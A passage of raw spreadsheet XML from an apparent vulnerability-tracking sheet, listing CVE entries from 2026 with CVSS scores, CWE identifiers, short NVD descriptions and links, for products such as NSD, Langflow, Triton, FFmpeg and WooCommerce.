r="R1076" s="5" t="inlineStr"><is><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is></c><c r="S1076" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12483</t></is></c></row><row r="1077"><c r="A1077" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1077" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1077" s="5" t="inlineStr"><is><t>CVE-2026-13297</t></is></c><c r="D1077" s="5" t="n"><v>7.5</v></c><c r="E1077" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1077" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1077" s="5" t="inlineStr" /><c r="H1077" s="5" t="n"><v>0.002</v></c><c r="I1077" s="5" t="inlineStr" /><c r="J1077" s="5" t="inlineStr" /><c r="K1077" s="5" t="inlineStr" /><c r="L1077" s="5" t="inlineStr" /><c r="M1077" s="5" t="inlineStr" /><c r="N1077" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1077" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1077" s="5" t="inlineStr" /><c r="Q1077" s="5" t="inlineStr"><is><t>CWE-1336</t></is></c><c r="R1077" s="5" t="inlineStr"><is><t>IBM Verify Identity Access Advanced Access Control may be vulnerable to an information disclosure attack.</t></is></c><c r="S1077" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-13297</t></is></c></row><row r="1078"><c r="A1078" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1078" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1078" s="5" t="inlineStr"><is><t>CVE-2026-16025</t></is></c><c r="D1078" s="5" t="n"><v>7.5</v></c><c r="E1078" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1078" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1078" s="5" t="inlineStr" /><c r="H1078" s="5" t="n"><v>0.003</v></c><c r="I1078" s="5" t="inlineStr" /><c r="J1078" s="5" t="inlineStr" /><c r="K1078" s="5" t="inlineStr" /><c r="L1078" s="5" t="inlineStr" /><c r="M1078" s="5" t="inlineStr" /><c r="N1078" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1078" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1078" s="5" t="inlineStr" /><c r="Q1078" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="R1078" s="5" t="inlineStr"><is><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is></c><c r="S1078" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16025</t></is></c></row><row r="1079"><c r="A1079" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1079" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1079" s="5" t="inlineStr"><is><t>CVE-2026-16037</t></is></c><c r="D1079" s="5" t="n"><v>7.5</v></c><c r="E1079" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1079" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1079" s="5" t="inlineStr" /><c r="H1079" s="5" t="n"><v>0.003</v></c><c r="I1079" s="5" t="inlineStr" /><c r="J1079" s="5" t="inlineStr" /><c r="K1079" s="5" t="inlineStr" /><c r="L1079" s="5" t="inlineStr" /><c r="M1079" s="5" t="inlineStr" /><c r="N1079" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1079" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1079" s="5" t="inlineStr" /><c r="Q1079" s="5" t="inlineStr"><is><t>CWE-208</t></is></c><c r="R1079" s="5" t="inlineStr"><is><t>Observable timing discrepancy vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Black Box Reverse Engineering.

This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t></is></c><c r="S1079" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16037</t></is></c></row><row r="1080"><c r="A1080" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1080" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1080" s="5" t="inlineStr"><is><t>CVE-2026-16497</t></is></c><c r="D1080" s="5" t="n"><v>7.5</v></c><c r="E1080" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1080" s="5" t="inlineStr"><is><t>psirt@nvidia.com</t></is></c><c r="G1080" s="5" t="inlineStr" /><c r="H1080" s="5" t="n"><v>0.004</v></c><c r="I1080" s="5" t="inlineStr" /><c r="J1080" s="5" t="inlineStr" /><c r="K1080" s="5" t="inlineStr" /><c r="L1080" s="5" t="inlineStr" /><c r="M1080" s="5" t="inlineStr" /><c r="N1080" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1080" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1080" s="5" t="inlineStr" /><c r="Q1080" s="5" t="inlineStr"><is><t>CWE-834</t></is></c><c r="R1080" s="5" t="inlineStr"><is><t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could cause excessive iteration. A successful exploit of this vulnerability might lead to denial of service.</t></is></c><c r="S1080" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16497</t></is></c></row><row r="1081"><c r="A1081" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1081" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1081" s="5" t="inlineStr"><is><t>CVE-2026-18056</t></is></c><c r="D1081" s="5" t="n"><v>7.5</v></c><c r="E1081" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1081" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1081" s="5" t="inlineStr" /><c r="H1081" s="5" t="n"><v>0.003</v></c><c r="I1081" s="5" t="inlineStr" /><c r="J1081" s="5" t="inlineStr" /><c r="K1081" s="5" t="inlineStr" /><c r="L1081" s="5" t="inlineStr" /><c r="M1081" s="5" t="inlineStr" /><c r="N1081" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1081" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1081" s="5" t="inlineStr" /><c r="Q1081" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R1081" s="5" t="inlineStr"><is><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is></c><c r="S1081" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18056</t></is></c></row><row r="1082"><c r="A1082" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1082" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1082" s="5" t="inlineStr"><is><t>CVE-2026-18672</t></is></c><c r="D1082" s="5" t="n"><v>7.5</v></c><c r="E1082" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1082" s="5" t="inlineStr"><is><t>security@progress.com</t></is></c><c r="G1082" s="5" t="inlineStr" /><c r="H1082" s="5" t="n"><v>0.004</v></c><c r="I1082" s="5" t="inlineStr" /><c r="J1082" s="5" t="inlineStr" /><c r="K1082" s="5" t="inlineStr" /><c r="L1082" s="5" t="inlineStr" /><c r="M1082" s="5" t="inlineStr" /><c r="N1082" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1082" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P1082" s="5" t="inlineStr" /><c r="Q1082" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1082" s="5" t="inlineStr"><is><t>In Progress® Telerik® UI for AJAX prior to v2026.3.812, insufficient validation of client-supplied state in RadImageEditor may allow an attacker to influence which file is returned by the control's image cache, potentially exposing file contents outside the intended image directories.</t></is></c><c r="S1082" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18672</t></is></c></row><row r="1083"><c r="A1083" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1083" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1083" s="5" t="inlineStr"><is><t>CVE-2026-18916</t></is></c><c r="D1083" s="5" t="n"><v>7.5</v></c><c r="E1083" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1083" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1083" s="5" t="inlineStr" /><c r="H1083" s="5" t="n"><v>0.004</v></c><c r="I1083" s="5" t="inlineStr" /><c r="J1083" s="5" t="inlineStr" /><c r="K1083" s="5" t="inlineStr"><is><t>nlnetlabs:nsd</t></is></c><c r="L1083" s="5" t="inlineStr" /><c r="M1083" s="5" t="inlineStr" /><c r="N1083" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1083" s="5" t="inlineStr"><is><t>2026-08-26</t></is></c><c r="P1083" s="5" t="inlineStr" /><c r="Q1083" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="R1083" s="5" t="inlineStr"><is><t>Any remote client can crash a NSD serve child, by throttling the TCP receive window after a TCP query. By continuously crashing the serve childs, the remote client can denial all TCP service to this NSD instance.</t></is></c><c r="S1083" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18916</t></is></c></row><row r="1084"><c r="A1084" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1084" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1084" s="5" t="inlineStr"><is><t>CVE-2026-19080</t></is></c><c r="D1084" s="5" t="n"><v>7.5</v></c><c r="E1084" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1084" s="5" t="inlineStr"><is><t>iletisim@usom.gov.tr</t></is></c><c r="G1084" s="5" t="inlineStr" /><c r="H1084" s="5" t="n"><v>0.003</v></c><c r="I1084" s="5" t="inlineStr" /><c r="J1084" s="5" t="inlineStr" /><c r="K1084" s="5" t="inlineStr" /><c r="L1084" s="5" t="inlineStr" /><c r="M1084" s="5" t="inlineStr" /><c r="N1084" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1084" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1084" s="5" t="inlineStr" /><c r="Q1084" s="5" t="inlineStr"><is><t>CWE-204</t></is></c><c r="R1084" s="5" t="inlineStr"><is><t>Observable response discrepancy vulnerability in Menulux Software Inc. Menulux Portal allows Account Footprinting.

This issue affects Menulux Portal: before 20260903211448.</t></is></c><c r="S1084" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19080</t></is></c></row><row r="1085"><c r="A1085" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1085" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1085" s="5" t="inlineStr"><is><t>CVE-2026-19118</t></is></c><c r="D1085" s="5" t="n"><v>7.5</v></c><c r="E1085" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1085" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1085" s="5" t="inlineStr" /><c r="H1085" s="5" t="n"><v>0.005</v></c><c r="I1085" s="5" t="inlineStr" /><c r="J1085" s="5" t="inlineStr" /><c r="K1085" s="5" t="inlineStr"><is><t>github:enterprise_server</t></is></c><c r="L1085" s="5" t="inlineStr" /><c r="M1085" s="5" t="inlineStr" /><c r="N1085" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1085" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1085" s="5" t="inlineStr" /><c r="Q1085" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="R1085" s="5" t="inlineStr"><is><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is></c><c r="S1085" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19118</t></is></c></row><row r="1086"><c r="A1086" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1086" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1086" s="5" t="inlineStr"><is><t>CVE-2026-19205</t></is></c><c r="D1086" s="5" t="n"><v>7.5</v></c><c r="E1086" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1086" s="5" t="inlineStr"><is><t>iletisim@usom.gov.tr</t></is></c><c r="G1086" s="5" t="inlineStr" /><c r="H1086" s="5" t="n"><v>0.002</v></c><c r="I1086" s="5" t="inlineStr" /><c r="J1086" s="5" t="inlineStr" /><c r="K1086" s="5" t="inlineStr" /><c r="L1086" s="5" t="inlineStr" /><c r="M1086" s="5" t="inlineStr" /><c r="N1086" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1086" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1086" s="5" t="inlineStr" /><c r="Q1086" s="5" t="inlineStr"><is><t>CWE-204</t></is></c><c r="R1086" s="5" t="inlineStr"><is><t>Observable response discrepancy vulnerability in GastroMenum GastroMenum Web Panel allows Account Footprinting.

This issue affects GastroMenum Web Panel: before 31.08.2026.</t></is></c><c r="S1086" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19205</t></is></c></row><row r="1087"><c r="A1087" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1087" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1087" s="5" t="inlineStr"><is><t>CVE-2026-19300</t></is></c><c r="D1087" s="5" t="n"><v>7.5</v></c><c r="E1087" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1087" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1087" s="5" t="inlineStr" /><c r="H1087" s="5" t="n"><v>0.004</v></c><c r="I1087" s="5" t="inlineStr" /><c r="J1087" s="5" t="inlineStr" /><c r="K1087" s="5" t="inlineStr"><is><t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1087" s="5" t="inlineStr" /><c r="M1087" s="5" t="inlineStr" /><c r="N1087" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1087" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1087" s="5" t="inlineStr" /><c r="Q1087" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R1087" s="5" t="inlineStr"><is><t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote attacker to obtain sensitive information due to incomplete scrubbing of sensitive credential fields.</t></is></c><c r="S1087" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19300</t></is></c></row><row r="1088"><c r="A1088" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1088" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1088" s="5" t="inlineStr"><is><t>CVE-2026-19305</t></is></c><c r="D1088" s="5" t="n"><v>7.5</v></c><c r="E1088" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1088" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1088" s="5" t="inlineStr" /><c r="H1088" s="5" t="n"><v>0.003</v></c><c r="I1088" s="5" t="inlineStr" /><c r="J1088" s="5" t="inlineStr" /><c r="K1088" s="5" t="inlineStr"><is><t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1088" s="5" t="inlineStr" /><c r="M1088" s="5" t="inlineStr" /><c r="N1088" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1088" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1088" s="5" t="inlineStr" /><c r="Q1088" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1088" s="5" t="inlineStr"><is><t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote attacker to obtain sensitive information due to server-side request forgery.</t></is></c><c r="S1088" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19305</t></is></c></row><row r="1089"><c r="A1089" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1089" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1089" s="5" t="inlineStr"><is><t>CVE-2026-19401</t></is></c><c r="D1089" s="5" t="n"><v>7.5</v></c><c r="E1089" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1089" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1089" s="5" t="inlineStr" /><c r="H1089" s="5" t="n"><v>0.004</v></c><c r="I1089" s="5" t="inlineStr" /><c r="J1089" s="5" t="inlineStr" /><c r="K1089" s="5" t="inlineStr"><is><t>nlnetlabs:nsd</t></is></c><c r="L1089" s="5" t="inlineStr" /><c r="M1089" s="5" t="inlineStr" /><c r="N1089" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1089" s="5" t="inlineStr"><is><t>2026-08-26</t></is></c><c r="P1089" s="5" t="inlineStr" /><c r="Q1089" s="5" t="inlineStr"><is><t>CWE-400, CWE-617</t></is></c><c r="R1089" s="5" t="inlineStr"><is><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is></c><c r="S1089" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19401</t></is></c></row><row r="1090"><c r="A1090" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1090" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1090" s="5" t="inlineStr"><is><t>CVE-2026-19538</t></is></c><c r="D1090" s="5" t="n"><v>7.5</v></c><c r="E1090" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1090" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1090" s="5" t="inlineStr" /><c r="H1090" s="5" t="n"><v>0.003</v></c><c r="I1090" s="5" t="inlineStr" /><c r="J1090" s="5" t="inlineStr" /><c r="K1090" s="5" t="inlineStr"><is><t>nlnetlabs:nsd</t></is></c><c r="L1090" s="5" t="inlineStr" /><c r="M1090" s="5" t="inlineStr" /><c r="N1090" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1090" s="5" t="inlineStr"><is><t>2026-08-26</t></is></c><c r="P1090" s="5" t="inlineStr" /><c r="Q1090" s="5" t="inlineStr"><is><t>CWE-290, CWE-672</t></is></c><c r="R1090" s="5" t="inlineStr"><is><t>The BLOCKED access control list items that are evaluated to deny access on the the proxy protocol port can be bypassed completely when connecting over TCP or TLS and sending the query twice on connection that is kept open.</t></is></c><c r="S1090" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19538</t></is></c></row><row r="1091"><c r="A1091" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1091" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1091" s="5" t="inlineStr"><is><t>CVE-2026-19858</t></is></c><c r="D1091" s="5" t="n"><v>7.5</v></c><c r="E1091" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1091" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1091" s="5" t="inlineStr" /><c r="H1091" s="5" t="n"><v>0.003</v></c><c r="I1091" s="5" t="inlineStr" /><c r="J1091" s="5" t="inlineStr" /><c r="K1091" s="5" t="inlineStr" /><c r="L1091" s="5" t="inlineStr" /><c r="M1091" s="5" t="inlineStr" /><c r="N1091" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1091" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1091" s="5" t="inlineStr" /><c r="Q1091" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R1091" s="5" t="inlineStr"><is><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is></c><c r="S1091" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19858</t></is></c></row><row r="1092"><c r="A1092" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1092" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1092" s="5" t="inlineStr"><is><t>CVE-2026-26456</t></is></c><c r="D1092" s="5" t="n"><v>7.5</v></c><c r="E1092" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1092" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1092" s="5" t="inlineStr" /><c r="H1092" s="5" t="n"><v>0.003</v></c><c r="I1092" s="5" t="inlineStr" /><c r="J1092" s="5" t="inlineStr" /><c r="K1092" s="5" t="inlineStr" /><c r="L1092" s="5" t="inlineStr" /><c r="M1092" s="5" t="inlineStr" /><c r="N1092" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1092" s="5" t="inlineStr"><is><t>2026-08-27</t></is></c><c r="P1092" s="5" t="inlineStr" /><c r="Q1092" s="5" t="inlineStr"><is><t>CWE-362, CWE-476</t></is></c><c r="R1092" s="5" t="inlineStr"><is><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is></c><c r="S1092" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-26456</t></is></c></row><row r="1093"><c r="A1093" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1093" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1093" s="5" t="inlineStr"><is><t>CVE-2026-28604</t></is></c><c r="D1093" s="5" t="n"><v>7.5</v></c><c r="E1093" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1093" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1093" s="5" t="inlineStr" /><c r="H1093" s="5" t="n"><v>0.002</v></c><c r="I1093" s="5" t="inlineStr" /><c r="J1093" s="5" t="inlineStr" /><c r="K1093" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1093" s="5" t="inlineStr" /><c r="M1093" s="5" t="inlineStr" /><c r="N1093" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1093" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1093" s="5" t="inlineStr" /><c r="Q1093" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R1093" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible use after free due to a race condition. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S1093" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28604</t></is></c></row><row r="1094"><c r="A1094" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1094" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1094" s="5" t="inlineStr"><is><t>CVE-2026-3174</t></is></c><c r="D1094" s="5" t="n"><v>7.5</v></c><c r="E1094" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1094" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1094" s="5" t="inlineStr" /><c r="H1094" s="5" t="n"><v>0.003</v></c><c r="I1094" s="5" t="inlineStr" /><c r="J1094" s="5" t="inlineStr" /><c r="K1094" s="5" t="inlineStr" /><c r="L1094" s="5" t="inlineStr" /><c r="M1094" s="5" t="inlineStr" /><c r="N1094" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1094" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1094" s="5" t="inlineStr" /><c r="Q1094" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1094" s="5" t="inlineStr"><is><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is></c><c r="S1094" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-3174</t></is></c></row><row r="1095"><c r="A1095" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1095" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1095" s="5" t="inlineStr"><is><t>CVE-2026-38344</t></is></c><c r="D1095" s="5" t="n"><v>7.5</v></c><c r="E1095" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1095" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1095" s="5" t="inlineStr" /><c r="H1095" s="5" t="n"><v>0.003</v></c><c r="I1095" s="5" t="inlineStr" /><c r="J1095" s="5" t="inlineStr" /><c r="K1095" s="5" t="inlineStr" /><c r="L1095" s="5" t="inlineStr" /><c r="M1095" s="5" t="inlineStr" /><c r="N1095" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1095" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1095" s="5" t="inlineStr" /><c r="Q1095" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R1095" s="5" t="inlineStr"><is><t>A NULL pointer dereference in the get_min_buffer_size function (/libswscale/slice.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted video file.</t></is></c><c r="S1095" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-38344</t></is></c></row><row r="1096"><c r="A1096" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1096" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1096" s="5" t="inlineStr"><is><t>CVE-2026-38347</t></is></c><c r="D1096" s="5" t="n"><v>7.5</v></c><c r="E1096" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1096" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1096" s="5" t="inlineStr" /><c r="H1096" s="5" t="n"><v>0.003</v></c><c r="I1096" s="5" t="inlineStr" /><c r="J1096" s="5" t="inlineStr" /><c r="K1096" s="5" t="inlineStr" /><c r="L1096" s="5" t="inlineStr" /><c r="M1096" s="5" t="inlineStr" /><c r="N1096" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1096" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1096" s="5" t="inlineStr" /><c r="Q1096" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1096" s="5" t="inlineStr"><is><t>A heap overflow in the ff_sws_alphablendaway function (libswscale/alphablend.c) of FFmpeg git-master commit 722a217 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t></is></c><c r="S1096" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-38347</t></is></c></row><row r="1097"><c r="A1097" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1097" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1097" s="5" t="inlineStr"><is><t>CVE-2026-47625</t></is></c><c r="D1097" s="5" t="n"><v>7.5</v></c><c r="E1097" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1097" s="5" t="inlineStr"><is><t>psirt@nvidia.com</t></is></c><c r="G1097" s="5" t="inlineStr" /><c r="H1097" s="5" t="n"><v>0.004</v></c><c r="I1097" s="5" t="inlineStr" /><c r="J1097" s="5" t="inlineStr" /><c r="K1097" s="5" t="inlineStr" /><c r="L1097" s="5" t="inlineStr" /><c r="M1097" s="5" t="inlineStr" /><c r="N1097" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1097" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1097" s="5" t="inlineStr" /><c r="Q1097" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1097" s="5" t="inlineStr"><is><t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could abuse missing authorization. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and denial of service.</t></is></c><c r="S1097" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47625</t></is></c></row><row r="1098"><c r="A1098" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1098" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1098" s="5" t="inlineStr"><is><t>CVE-2026-48888</t></is></c><c r="D1098" s="5" t="n"><v>7.5</v></c><c r="E1098" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1098" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1098" s="5" t="inlineStr" /><c r="H1098" s="5" t="n"><v>0.003</v></c><c r="I1098" s="5" t="inlineStr" /><c r="J1098" s="5" t="inlineStr" /><c r="K1098" s="5" t="inlineStr" /><c r="L1098" s="5" t="inlineStr" /><c r="M1098" s="5" t="inlineStr" /><c r="N1098" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1098" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1098" s="5" t="inlineStr" /><c r="Q1098" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R1098" s="5" t="inlineStr"><is><t>Allocation of Resources Without Limits or Throttling vulnerability in Automattic WooCommerce allows HTTP DoS.

This issue affects WooCommerce: from n/a before 11.1.0.</t></is></c><c r="S1098" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48888</t></is></c></row><row r="1099"><c r="A1099" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1099" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1099" s="5" t="inlineStr"><is><t>CVE-2026-52770</t></is></c><c r="D1099" s="5" t="n"><v>7.5</v></c><c r="E1099" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1099" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1099" s="5" t="inlineStr" /><c r="H1099" s="5" t="n"><v>0.003</v></c><c r="I1099" s="5" t="inlineStr" /><c r="J1099" s="5" t="inlineStr" /><c r="K1099" s="5" t="inlineStr" /><c r="L1099" s="5" t="inlineStr" /><c r="M1099" s="5" t="inlineStr" /><c r="N1099" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1099" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1099" s="5" t="inlineStr" /><c r="Q1099" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1099" s="5" t="inlineStr"><is><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is></c><c r="S1099" s="6" 